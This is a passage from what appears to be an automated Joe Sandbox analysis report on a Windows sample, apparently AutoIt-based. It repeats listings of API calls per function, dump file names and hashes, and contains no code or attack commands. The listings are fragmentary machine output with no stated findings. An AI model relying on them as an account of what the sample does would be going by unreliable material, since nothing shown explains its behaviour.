                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                      • String ID:
                                                                      • API String ID: 650687236-0
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00FFEF06
                                                                      • VariantClear.OLEAUT32(00000013), ref: 00FFEF78
                                                                      • VariantClear.OLEAUT32(00000000), ref: 00FFEFD3
                                                                      • _memmove.LIBCMT ref: 00FFEFFD
                                                                      • VariantClear.OLEAUT32(?), ref: 00FFF04A
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FFF078
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                      • String ID:
                                                                      • API String ID: 1101466143-0
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 01002258
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010022A3
                                                                      • IsMenu.USER32(00000000), ref: 010022C3
                                                                      • CreatePopupMenu.USER32 ref: 010022F7
                                                                      • GetMenuItemCount.USER32(000000FF), ref: 01002355
                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01002386
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                      • String ID:
                                                                      • API String ID: 3311875123-0
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00FA179A
                                                                      • GetWindowRect.USER32(?,?), ref: 00FA17FE
                                                                      • ScreenToClient.USER32(?,?), ref: 00FA181B
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FA182C
                                                                      • EndPaint.USER32(?,?), ref: 00FA1876
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 1827037458-0
                                                                      APIs
                                                                      • ShowWindow.USER32(010657B0,00000000,015855C0,?,?,010657B0,?,0102B5A8,?,?), ref: 0102B712
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 0102B736
                                                                      • ShowWindow.USER32(010657B0,00000000,015855C0,?,?,010657B0,?,0102B5A8,?,?), ref: 0102B796
                                                                      • ShowWindow.USER32(00000000,00000004,?,0102B5A8,?,?), ref: 0102B7A8
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 0102B7CC
                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0102B7EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,01014E41,?,?,00000000,00000001), ref: 010170AC
                                                                        • Part of subcall function 010139A0: GetWindowRect.USER32(?,?), ref: 010139B3
                                                                      • GetDesktopWindow.USER32 ref: 010170D6
                                                                      • GetWindowRect.USER32(00000000), ref: 010170DD
                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0101710F
                                                                        • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
                                                                      • GetCursorPos.USER32(?), ref: 0101713B
                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01017199
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                      • String ID:
                                                                      • API String ID: 4137160315-0
                                                                      • Opcode ID: e16013cae6069d576a07c69fee24e3673d641b8acdcdb44ce3409e324d66c642
                                                                      • Instruction ID: 1888481d57e5138fbc74211255dcb0563f793fced078e0d644b18e1b5405e671
                                                                      • Opcode Fuzzy Hash: e16013cae6069d576a07c69fee24e3673d641b8acdcdb44ce3409e324d66c642
                                                                      • Instruction Fuzzy Hash: 1131B072505316ABD730DF18C848F9BBBEAFF88354F100919F5C597181CA79EA09CB92
                                                                      APIs
                                                                        • Part of subcall function 00FF80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FF80C0
                                                                        • Part of subcall function 00FF80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FF80CA
                                                                        • Part of subcall function 00FF80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FF80D9
                                                                        • Part of subcall function 00FF80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FF80E0
                                                                        • Part of subcall function 00FF80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FF80F6
                                                                      • GetLengthSid.ADVAPI32(?,00000000,00FF842F), ref: 00FF88CA
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FF88D6
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FF88DD
                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00FF88F6
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00FF842F), ref: 00FF890A
                                                                      • HeapFree.KERNEL32(00000000), ref: 00FF8911
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 3008561057-0
                                                                      • Opcode ID: b90454d8b28ffd421c8faf405c634680127f5ac2c31fb4ef693e7385a11f7fce
                                                                      • Instruction ID: 3e7e1e884d5ba6b9d2b39a2f3e5f6e277a0c203ad6e8e5b40aef79066b1a751f
                                                                      • Opcode Fuzzy Hash: b90454d8b28ffd421c8faf405c634680127f5ac2c31fb4ef693e7385a11f7fce
                                                                      • Instruction Fuzzy Hash: CD11A231901209FFDB309FA4DC0ABBE7B78EF457A1F604018E98597210CB769901EB60
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FF85E2
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00FF85E9
                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FF85F8
                                                                      • CloseHandle.KERNEL32(00000004), ref: 00FF8603
                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FF8632
                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FF8646
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      • Opcode ID: 0885bbbee9b3f22e1265910e694688765747b4d921b0119ad2bb1768b551a65a
                                                                      • Instruction ID: 1bca48068c8acd8246d98ca295b13a60b1801450f311f5be292fe41d5d36a248
                                                                      • Opcode Fuzzy Hash: 0885bbbee9b3f22e1265910e694688765747b4d921b0119ad2bb1768b551a65a
                                                                      • Instruction Fuzzy Hash: 0F11597250024EABDF218EA4DD49FEE7BB9EF08794F184055FE05E2160C7768D61EB60
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00FFB7B5
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FFB7C6
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FFB7CD
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00FFB7D5
                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FFB7EC
                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 00FFB7FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: 47a237ed46cb191c96f9c73eb2b3276d3f425f45cf5c5959b1d89ffb8c46d0db
                                                                      • Instruction ID: e228ca047a89fa307a799a8bddaa7445c89593c26b1f5f493b2cae0d9e27ca00
                                                                      • Opcode Fuzzy Hash: 47a237ed46cb191c96f9c73eb2b3276d3f425f45cf5c5959b1d89ffb8c46d0db
                                                                      • Instruction Fuzzy Hash: B2017175E00209BBEB20AFB69D49A5ABFB8EF48361F104065FA04A7291D6359C00CF90
                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FC0193
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FC019B
                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FC01A6
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FC01B1
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FC01B9
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FC01C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: 708bfeaebe1d1ffc257d07613c75286e03c050181c5a4d7259cd2fad441ee9b5
                                                                      • Instruction ID: 57e22c956061d07f80c418e64a8e773f935cfcc353254db86e6c6b6c55b79677
                                                                      • Opcode Fuzzy Hash: 708bfeaebe1d1ffc257d07613c75286e03c050181c5a4d7259cd2fad441ee9b5
                                                                      • Instruction Fuzzy Hash: E90148B090275A7DE3108F6A8C85A52FEA8FF19394F00411BA15847941C7B5A868CBE5
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 010053F9
                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0100540F
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0100541E
                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100542D
                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01005437
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0100543E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      • Opcode ID: 1159ea1bdc14368a5da6ee717ebde71af6b96b62d4d2808a0c2d6825920a2302
                                                                      • Instruction ID: 292ed7cb422bd956d4e581eae71df40da1f8486edaa14c60ded6d4c1977e6565
                                                                      • Opcode Fuzzy Hash: 1159ea1bdc14368a5da6ee717ebde71af6b96b62d4d2808a0c2d6825920a2302
                                                                      • Instruction Fuzzy Hash: B9F06D32240159BBE7315EA29C0EEEB7A7CEBCAB51F100159FA44D1081DAAA1A0187B5
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 01007243
                                                                      • EnterCriticalSection.KERNEL32(?,?,00FB0EE4,?,?), ref: 01007254
                                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00FB0EE4,?,?), ref: 01007261
                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FB0EE4,?,?), ref: 0100726E
                                                                        • Part of subcall function 01006C35: CloseHandle.KERNEL32(00000000,?,0100727B,?,00FB0EE4,?,?), ref: 01006C3F
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 01007281
                                                                      • LeaveCriticalSection.KERNEL32(?,?,00FB0EE4,?,?), ref: 01007288
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3495660284-0
                                                                      • Opcode ID: e816db8170c35e4fae9d309af9e8c2daddc841bd4bed9cd76b9853921df3a51f
                                                                      • Instruction ID: 2f01443e139eb11c335f00e6fcd91c2b07385498c8101699587fe8e1ee24ce96
                                                                      • Opcode Fuzzy Hash: e816db8170c35e4fae9d309af9e8c2daddc841bd4bed9cd76b9853921df3a51f
                                                                      • Instruction Fuzzy Hash: 9AF09A36441213ABE7722F24EE4C9EA7B3AEF07342F200121F28290098CB7B1404CB50
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FF899D
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00FF89A9
                                                                      • CloseHandle.KERNEL32(?), ref: 00FF89B2
                                                                      • CloseHandle.KERNEL32(?), ref: 00FF89BA
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00FF89C3
                                                                      • HeapFree.KERNEL32(00000000), ref: 00FF89CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: 4a0339f0c44bac58b0506a50babd2375ec10fe801747be7a82df39684bf9b689
                                                                      • Instruction ID: 2e6ba555572b31135730851b36a46976c0084085315d072ab6684b7c2a9985a1
                                                                      • Opcode Fuzzy Hash: 4a0339f0c44bac58b0506a50babd2375ec10fe801747be7a82df39684bf9b689
                                                                      • Instruction Fuzzy Hash: 6CE0C936004002BBD6212FE1ED0C915BB79FB893A27B08220F255C1068CB375420DB50
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 01018613
                                                                      • CharUpperBuffW.USER32(?,?), ref: 01018722
                                                                      • VariantClear.OLEAUT32(?), ref: 0101889A
                                                                        • Part of subcall function 01007562: VariantInit.OLEAUT32(00000000), ref: 010075A2
                                                                        • Part of subcall function 01007562: VariantCopy.OLEAUT32(00000000,?), ref: 010075AB
                                                                        • Part of subcall function 01007562: VariantClear.OLEAUT32(00000000), ref: 010075B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                      • API String ID: 4237274167-1221869570
                                                                      • Opcode ID: ee13d1b14200b203fce039a17e4ea4eb856bb93079c6dc6ec3bb3b925cbd404c
                                                                      • Instruction ID: 24d72ea266a33fca6477071b0c6e46e5bab84c2869f27ccec5b478ee3abd7f84
                                                                      • Opcode Fuzzy Hash: ee13d1b14200b203fce039a17e4ea4eb856bb93079c6dc6ec3bb3b925cbd404c
                                                                      • Instruction Fuzzy Hash: 59916D716083019FC710DF24C88495BBBF4EF89754F04896EF99A8B365DB39EA05CB92
                                                                      APIs
                                                                        • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
                                                                      • _memset.LIBCMT ref: 01002B87
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01002BB6
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01002C69
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01002C97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                      • String ID: 0
                                                                      • API String ID: 4152858687-4108050209
                                                                      • Opcode ID: e6835d11410a0ecfd9f08c9844e758be8ed60e3830008c1f9cd82ddbaaf99f03
                                                                      • Instruction ID: 72f41bb81f7ac7fe784808763486699913188921cec4575ed96af97a786c4fef
                                                                      • Opcode Fuzzy Hash: e6835d11410a0ecfd9f08c9844e758be8ed60e3830008c1f9cd82ddbaaf99f03
                                                                      • Instruction Fuzzy Hash: B851DC712083059EF7A6DEA8C849A6BBBE8EF89350F040A6DF9C5D21D1DB74C9448B52
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FFD5D4
                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FFD60A
                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FFD61B
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FFD69D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 753597075-1075368562
                                                                      • Opcode ID: 20ca1c8114f6ed86f773168e3f27c4216f0d53dbf0f1b5f8989a70a26b93056a
                                                                      • Instruction ID: f80ea59fa7337ee73b5e1b127919b757058d0cb2df356e0ac48e131490d56142
                                                                      • Opcode Fuzzy Hash: 20ca1c8114f6ed86f773168e3f27c4216f0d53dbf0f1b5f8989a70a26b93056a
                                                                      • Instruction Fuzzy Hash: 6041AFB2600208EFDB15DF54C884AAA7BBAEF44314F1581A9EE09DF215D7B5DD40EBA0
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 010027C0
                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 010027DC
                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 01002822
                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01065890,00000000), ref: 0100286B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
